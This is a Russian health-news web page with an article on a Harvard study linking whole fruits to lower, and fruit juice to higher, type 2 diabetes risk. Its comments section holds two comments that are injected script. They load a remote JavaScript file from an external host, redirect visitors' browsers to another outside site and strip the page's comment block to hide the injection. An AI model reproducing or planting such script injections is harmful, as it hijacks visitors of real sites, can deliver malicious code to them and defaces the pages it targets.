Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Съел целый фрукт – не заб...  >>  Съел целый фрукт – не заболел диабетом
 
Обратная связь
 

Съел целый фрукт – не заболел диабетом

Размер шрифта
19 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Гарвардской школы общественного здоровья пришли к удивительному выводу: оказывается, цельные ягоды и фрукты (в особенности черника, виноград и яблоки) снижают риск развития сахарного диабета, а соки из тех же самых фруктов – повышают.

Съел целый фрукт – не заболел диабетом

«Несмотря на то, что фрукты всегда рассматривались как компонент профилактической диеты против сахарного диабета, в ученом мире до сих пор не было единого мнения относительно максимального рекомендуемого уровня их употребления. Наши данные показывают, что определенные разновидности фруктов могут быть полезнее на этом поприще, чем остальные», – рассказывает Ки Сан, ведущий автор исследования.

Исследователи проанализировали архив данных с 1984 по 2008 годы. В нем заключалась информация, касающаяся 187 382 участников трех крупных эпидемиологических исследований. Пациенты с диагностированным диабетом, ишемической болезнью сердца и раком были исключены из исследовательской группы. Оказалось, что в ходе периода наблюдения у 12 198 участников (6,5% от всей выборки) диабет развился первично.

Ученые решили подвергнуть количественной оценке общий уровень потребления фруктов, а также частную статистику относительно конкретных видов, таких как: виноград или изюм, персики, чернослив, абрикосы, бананы, апельсины, яблоки, грейпфруты, клубника и черника. Кроме того, оценивался уровень потребления соков (в особенности яблочного, грейпфрутового, апельсинового, но и ряда других).

Сухие цифры по итогу выглядят следующим образом: две порции определенных цельных фруктов в неделю (в первую очередь – черники, винограда, яблок) снижали относительный риск развития диабета 2 типа на 23% в сравнении с теми, кто ел одну порцию в месяц или менее. Напротив, фруктовый сок на ежедневной основе повышал вышеописанный риск на 21%.

По-видимому, это связано с тем, что гликемический индекс (показатель, характеризующий скорость влияния продукта на уровень сахара крови) у соков всегда несколько выше, чем у цельных фруктов. Объясняется это тем, что содержащиеся в цельных фруктах волокна замедляют продвижение пищевого комка, отдаляя таким образом процесс всасывания углеводов.

Индивидуальный характер влияния конкретных фруктов на степень риска ученые связывают с уникальным химическим составов. Например, известно, что антоцианы, содержащиеся в ягодах и винограде, снижают вероятность сердечного приступа. Однако необходимы дальнейшие исследования для выяснения того, какие именно компоненты фруктов ответственны за снижение риска диабета.

«Таким образом, наши данные находятся в полном соответствии с уже имеющимися представлениями о превосходстве цельных фруктов над соками», – заявляет Исао Мураки, один из научных сотрудников.

Другую информацию касательно профилактики и лечения сахарного диабета ищите на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Перекус, который заставит вас купить штаны на размер меньше в Новом году   Как угробить свое сердце?!   Принюхайтесь к соседу! Запах человека говорит о его болезнях!   Шоколад сохранит вам ноги!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Худшие советы для похудения. Часть 3
Что может скрывать депрессия
6 суперпродуктов от диабета

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.